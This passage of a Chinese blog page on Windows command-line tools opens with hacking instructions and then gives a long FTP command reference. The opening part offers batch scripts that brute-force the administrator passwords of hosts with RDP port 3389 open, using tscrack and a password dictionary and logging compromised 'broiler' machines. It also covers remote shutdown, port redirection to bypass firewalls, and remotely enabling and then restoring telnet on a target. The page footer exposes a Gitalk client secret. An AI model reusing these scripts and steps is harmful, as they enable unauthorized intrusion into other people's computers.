<p>　　@for /f “tokens=1 delims= “ %%i in (3389.txt) do call hack.bat %%i</p>
<p>　　nscan</p>
<p>　　@echo 3389.txt no find or scan faild</p>
<p>　　(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)</p>
<p>　　3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat</p>
<p>　　@if not exist tscrack.exe goto noscan</p>
<p>　　@tscrack %1 -l administrator -w pass.dic &gt;&gt;rouji.txt</p>
<p>　　:noscan</p>
<p>　　@echo tscrack.exe no find or scan faild</p>
<p>　　(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)</p>
<p>　　hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。</p>
<p>　　其它</p>
<p>　　Shutdown.exe</p>
<p>　　Shutdown IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）</p>
<p>　　fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）</p>
<p>　　fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时，他扫到的结果会完全是的主机信息</p>
<p>　　Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。</p>
<p>　　OpenTelnet.exe (远程开启telnet工具)</p>
<p>　　opentelnet.exe IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet ip 连接上对方。</p>
<p>　　NTLM认证方式：0：不使用NTLM身份验证；1：先尝试NTLM身份验证，如果失败，再使用用户名和密码；2：只使用NTLM身份验证。</p>
<p>　　ResumeTelnet.exe (OpenTelnet附带的另一个工具)</p>
<p>　　resumetelnet.exe IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。</p>
<p>　　FTP命令详解</p>
<p>　　FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。</p>
<p>　　FTP的命令行格式为：</p>
<p>　　ftp -v -d -i -n -g [主机名] ，其中</p>
<p>　　-v 显示远程服务器的所有响应信息</p>
<p>　　-n 限制ftp的自动登录，即不使用；.n etrc文件；</p>
<p>　　-d 使用调试方式；</p>
<p>　　-g 取消全局文件名。</p>
<p>　　FTP使用的内部命令如下(中括号表示可选项):</p>
<p>　　1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip</p>
<p>　　2.$ macro-ame[args]： 执行宏定义macro-name。</p>
<p>　　3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。</p>
<p>　　4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。</p>
<p>　　5.ascii：使用ascii类型传输方式。</p>
<p>　　6.bell：每个命令执行完毕后计算机响铃一次。</p>
<p>　　7.bin：使用二进制文件传输方式。</p>
<p>　　8.bye：退出ftp会话过程。</p>
<p>　　9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。</p>
<p>　　10. cd remote-dir：进入远程主机目录。</p>
<p>　　11.cdup：进入远程主机目录的父目录。</p>
<p>　　12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。</p>
<p>　　13.close：中断与远程服务器的ftp会话(与open对应)。</p>
<p>　　14 .cr：使用asscii方式传输文件时，将回车换行转换为回行。</p>
<p>　　15.delete remote-file：删除远程主机文件。</p>
<p>　　16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。</p>
<p>　　17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。</p>
<p>　　18.disconnection：同close。</p>
<p>　　19.form format：将文件传输方式设置为format，缺省为file方式。</p>
<p>　　20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。</p>
<p>　　21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。</p>
<p>　　22.hash：每传输1024字节，显示一个hash符号(#)。</p>
<p>　　23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。</p>
<p>　　24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。</p>
<p>　　25.image：设置二进制传输方式(同binary)。</p>
<p>　　26.lcd[dir]：将本地工作目录切换至dir。</p>
<p>　　27. ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。</p>
<p>　　28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。</p>
<p>　　29.mdelete[remote-file]：删除远程主机文件。</p>
<p>　　30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir <em>.o.</em>.zipoutfile 。</p>
<p>　　31.mget remote-files：传输多个远程文件。</p>
<p>　　32.mkdir dir-name：在远程主机中建一目录。</p>
<p>　　33.mls remote-file local-file：同nlist，但可指定多个文件名。</p>
<p>　　34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。</p>
<p>　　35.modtime file-name：显示远程主机文件的最后修改时间。</p>
<p>　　36.mput local-file：将多个文件传输至远程主机。</p>
<p>　　37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。</p>
<p>　　38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。</p>
<p>　　39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。</p>
<p>　　40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。</p>
<p>　　41.open host[port]：建立指定ftp服务器连接，可指定连接端口。</p>
<p>　　42.passive：进入被动传输方式。</p>
<p>　　43.prompt：设置多个文件传输时的交互提示。</p>
<p>　　44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。</p>
<p>　　45.put local-file[remote-file]：将本地文件local-file传送至远程主机。</p>
<p>　　46.pwd：显示远程主机的当前工作目录。</p>
<p>　　47.quit：同bye，退出ftp会话。</p>
<p>　　48.quote arg1，arg2…：将参数逐字发至远程ftp服务器，如：quote syst.</p>
<p>　　49.recv remote-file[local-file]：同get。</p>
<p>　　50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。</p>
<p>　　51.rhelp[cmd-name]：请求获得远程主机的帮助。</p>
<p>　　52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。</p>
<p>　　53.rename[from][to]：更改远程主机文件名。</p>
<p>　　54.reset：清除回答队列。</p>
<p>　　55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。</p>
<p>　　56.rmdir dir-name：删除远程主机目录。</p>
<p>　　57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。</p>
<p>　　58.send local-file[remote-file]：同put。</p>
<p>　　59.sendport：设置PORT命令的使用。</p>
<p>　　60.site arg1，arg2…：将参数作为SITE命令逐字发送至远程ftp主机。</p>
<p>　　61.size file-name：显示远程主机文件大小，如：site idle 7200。</p>
<p>　　62.status：显示当前ftp状态。</p>
<p>　　63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。</p>
<p>　　64.sunique：将远程主机文件名存储设置为只一(与runique对应)。</p>
<p>　　65.system：显示远程主机的操作系统类型。</p>
<p>　　66.tenex：将文件传输类型设置为TENEX机的所需的类型。</p>
<p>　　67.tick：设置传输时的字节计数器。</p>
<p>　　68.trace：设置包跟踪。</p>
<p>　　69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。</p>
<p>　　70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3</p>
<p>　　71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。</p>
<p>　　72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.</p>
<p>　　73.?[cmd]：同help.</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1487842110@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">Love</a>
</p>


<div class="article_copyright">
    <p><span class="copy-title">Title:</span>MD 格式</p>
    <p><span class="copy-title">文章字数:</span><span class="post-count">10.3k</span></p>
    <p><span class="copy-title">Author:</span><a  title="诸子百家-谁的天下?">诸子百家-谁的天下?</a></p>
    <p><span class="copy-title">Created At:</span>2020-05-08, 11:41:32</p>
    <p><span class="copy-title">Updated At:</span>2020-07-06, 09:48:06</p>
    <span class="copy-title">Url:</span><a class="post-url" href="/2020/05/08/Tools/Windows%E5%91%BD%E4%BB%A4/" title="MD 格式">http://yoursite.com/2020/05/08/Tools/Windows%E5%91%BD%E4%BB%A4/</a>
    <p>
        <span class="copy-title">Copyright:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>
</div>



    <div id="comments"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script type="text/javascript">
    $.getScript('/js/gitalk.js', function () {
        var gitalk = new Gitalk({
            clientID: '78dbe1e4dd28ca4c4b5e',
            clientSecret: 'e49ada68130b4d709a242b8dd8f4e844b14f35f9',
            repo: 'xinzhuzi.github.io',
            owner: 'xinzhuzi',
            admin: ['xinzhuzi'],
            id: decodeURI(location.pathname),
            distractionFreeMode: 'true',
            language: 'zh-CN',
            perPage: parseInt('20',10)
        })
        gitalk.render('comments')
    })
</script>




    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2016-2019 xinzhuzi</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/xinzhuzi/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" ></a>

    </div>
</div>
<div class="acParent"></div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>爱你,爱世人</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.png" class="alipay" title="扫码支持">
            <img src="/img/weixin.png" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">alipay</label></span><span><label><input type="radio" name="pay" value="weixin">weixin</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['@新诸子','@诸子百家-谁的天下?','#hexo','#诗词随笔','#杂项','#Net English Word','#CSharp','#Net','#Protobuf,lua','#re','#指针','#Renderer','#tool','#算法','#Unity','#BestHttp','#IndustrialAutomation','#Unity优化','#UnityEditor','#UGUI','#VSCode',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 542px;
        }
        .nav.fullscreen {
            margin-left: -542px;
        }
        .nav-left {
            width: 150px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 542px;
            margin-left: -542px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 542px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    
    .nav-right nav a.hover > span{
        color: #ffffff !important;
    }
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
